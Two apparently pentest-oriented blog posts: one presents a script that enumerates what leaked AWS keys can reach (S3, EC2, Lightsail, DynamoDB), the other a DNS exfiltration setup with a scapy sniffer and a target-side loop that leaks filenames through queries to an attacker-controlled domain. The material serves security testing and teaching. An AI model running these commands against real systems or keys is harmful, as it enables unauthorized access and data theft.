Thursday, February 23, 2017

Enumerate Leaked AWS API Key Access

Sometimes on a pentest engagement (or from https://gitleaks.com) you'll come across AWS API keys. If you want to know what those keys have access to, you can query the various AWS service API endpoints and see what they can reach. You can do this with the awscli tool, but I find it less than ideal to work with, and the JSON you have to parse can be annoying.
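For comparison, the manual awscli route means exporting the keys and calling each service yourself, then picking through the JSON it returns. Something like this (keys truncated the same way as in the usage example below):

$ export AWS_ACCESS_KEY_ID=AKXXXXXXXXXXXXXXXXXA
$ export AWS_SECRET_ACCESS_KEY=ENtXXXXXXXXXXXXXXXXXq
$ export AWS_DEFAULT_REGION=us-east-1
$ aws s3api list-buckets        # returns a JSON blob you then get to parse
$ aws dynamodb list-tables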

So I decided to write a tool, since I couldn't find one online. It's pretty simple: it takes an access key and secret key (the kind often found in configuration files and connection scripts), then goes service by service and queries useful information such as DynamoDB table names, S3 bucket names, and the number of objects in each bucket.
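The core of the approach is easy to sketch with boto3. Here's a minimal, hypothetical version covering just S3 and DynamoDB (this is not the actual AWSEnumerator code; boto3 and a hardcoded region are my assumptions):

#!/usr/bin/env python
# Hypothetical sketch of the approach using boto3 -- NOT the real AWSEnumerator.
import sys
import boto3

access_key, secret_key = sys.argv[1], sys.argv[2]
session = boto3.Session(aws_access_key_id=access_key,
                        aws_secret_access_key=secret_key,
                        region_name="us-east-1")  # assumed region

# S3: list buckets and count objects in each (capped at 1000, like the output below)
print("Checking for S3 buckets")
s3 = session.resource("s3")
for bucket in s3.buckets.all():
    count = sum(1 for _ in bucket.objects.limit(1000))
    print("  Bucket: {} [{} objects]".format(bucket.name, count))

# DynamoDB: list table names
print("Checking for DynamoDB Tables")
for table in session.client("dynamodb").list_tables()["TableNames"]:
    print("  Table Name: {}".format(table))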

So for example, let's say during your recon/OSINT phase you discover some AWS API creds exposed on gitleaks or in a config file. (The screenshot obviously isn't from a client, just a random entry on gitleaks.)

You take the "Access Key" and "Secret Key" and pump them into the AWSEnumerator script:
$ ./AWSEnumerator.py AKXXXXXXXXXXXXXXXXXA ENtXXXXXXXXXXXXXXXXXq
Checking for S3 buckets
  Total # of buckets: 9
    Bucket: bucket1 [8 objects]
    Bucket: bucket2 [1000 objects]
    Bucket: bucket3-dev [1000 objects]
    Bucket: bucket4 [1 objects]
    Bucket: bucket5 [747 objects]
    Bucket: otherbucket [1000 objects]
    Bucket: morebucket [54 objects]
    Bucket: whereismahbucket [26 objects]
    Bucket: ilikefish [95 objects]
Checking for EC2 Instances
  Total # of EC2 Instances: 2
    Instance: t2.nano - 52.570.576.548 - running
    Instance: t2.small - stopped
Checking for Lightsail Instances
  Total # of Lightsail instances: 1
    Name: enumtest1, Username: ubuntu, IP: 254.244.198.296, State: running
Checking for DynamoDB Tables
  Total # of DynamoDB Tables: 2
    Table Name: tabletest
    Table Name: test2
This information is fantastic for reporting purposes, as well as for escalating access or hunting down sensitive information.

Currently, the script supports:
  - EC2 Instances (type, IP, status)
  - S3 Buckets (name, number of objects)
  - Lightsail Instances (name, username, IP, state)
  - DynamoDB (table name)

I am planning on adding support for additional services as time goes on.

The tool can be found at https://github.com/atucom/AWSEnumerator

Friday, February 3, 2017

Super Simple DNS Exfiltration

I needed to test whether I had command execution on a target box. Pretty much every outbound port was blocked. Luckily, it's extremely rare for people to block outbound UDP port 53, so DNS queries can usually still make it through.

To get a basic DNS exfil setup working, you'll need a couple of things:
  1. A VPS to sniff the DNS queries
  2. A domain to direct the DNS queries to
The first step is to configure an NS record for a subdomain of your main domain. I simply created an NS record for e.domain.tld (replace domain.tld with your domain) and pointed it at the IP address of the VPS.
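Strictly speaking, an NS record points at a hostname rather than an IP, so in a raw zone file this usually ends up as an NS record for the subdomain plus an A record for the nameserver host. A hypothetical zone snippet (the names and IP are placeholders):

; delegate e.domain.tld to a nameserver host, then point that host at your VPS
e.domain.tld.      IN  NS  ns1.domain.tld.
ns1.domain.tld.    IN  A   203.0.113.10   ; VPS IP (placeholder)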

Now when someone requests somedata.e.domain.tld, the UDP request packet will go to the VPS IP. Run tshark/tcpdump there to grab the request and prove whether you have command execution.
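A quick capture on the VPS is enough to watch the queries arrive. Either of these works (the interface name is an assumption; adjust it for your VPS):

$ tcpdump -ni eth0 -s0 udp port 53
$ tshark -i eth0 -f "udp port 53"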

I wrote the following Python script (adapted in part from Stack Overflow) to parse out just the domain name being requested.

#!/usr/bin/env python2

from scapy.all import sniff
from scapy.layers.dns import DNSRR, DNS, DNSQR

def handlepkt(p):
    # thanks stackoverflow!
    if p.haslayer(DNS):
        if p[DNS].qdcount > 0 and isinstance(p[DNS].qd, DNSQR):
            # a query: print the name being looked up
            print p[DNS].qd.qname
        elif p[DNS].ancount > 0 and isinstance(p[DNS].an, DNSRR):
            # an answer: print the record data
            print p[DNS].an.rdata

# sniff DNS traffic on eth0 and hand each packet to handlepkt
sniff(iface="eth0", filter="udp and port 53", store=0, prn=handlepkt)

With the DNS records configured, start the Python sniffer on the VPS, then run something like the following on the target to exfiltrate the filenames in the current directory:

for i in *; do host $i.e.domain.tld; done

And watch the requests come in.